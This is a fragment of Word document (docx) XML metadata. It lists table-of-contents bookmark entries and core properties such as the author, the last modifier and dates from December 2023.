        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795833</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795832</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795831</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795830</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795829</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795828</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795827</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795826</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795825</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795824</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc152795823</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179698</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc15279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 Trọng Ánh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Guest User</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2023-12-06T15:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-06T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-06T15:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>